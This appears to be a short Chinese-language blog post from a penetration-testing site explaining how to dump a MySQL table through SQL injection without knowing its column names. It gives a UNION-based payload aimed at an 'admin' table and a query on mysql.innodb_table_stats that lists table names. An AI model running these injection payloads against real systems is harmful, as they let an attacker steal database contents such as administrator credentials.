• 首页
  • 渗透
  • 折腾
  • 转载
  • 关于Me
  • 榜上有名
  • 文章存档
  • 友情链接

不妨看看这里

会员面板

Base64 Image

Mysql注入时,猜不到列名,获取所有数据

  • Mr.Wu
  • 2020-04-16
  • 0
有时候我们不知道列名,因为不能访问Information_Schema或者其他原因 但是我们知道表名,我们可以在不知道列名的情况下dump出该表的全部数据 我们有两个表 article、admin 方案一
select title from article where id = 4 and 0 union SELECT group_concat(a, 0x3a, b) FROM (SELECT 1 a,2 b,3 c UNION SELECT * FROM admin)x
方案二 方案二是在exploit-db上看到的文章,Mysql版本大于5.5的情况下, 默认mysql数据库中多了两个表innodb_table_stats、innodb_table_index用来储存所有数据库名和表名 如果我们想获取某个数据库下面所有表名称
select table_name from mysql.innodb_table_stats where database_name=数据库名;
参考地址: https://www.exploit-db.com/docs/41274.pdf https://www.t00ls.net/articles-39545.html
© 2025 MrWu
Theme by Wing-child
  • {{ item.name }}
  • {{ item.name }}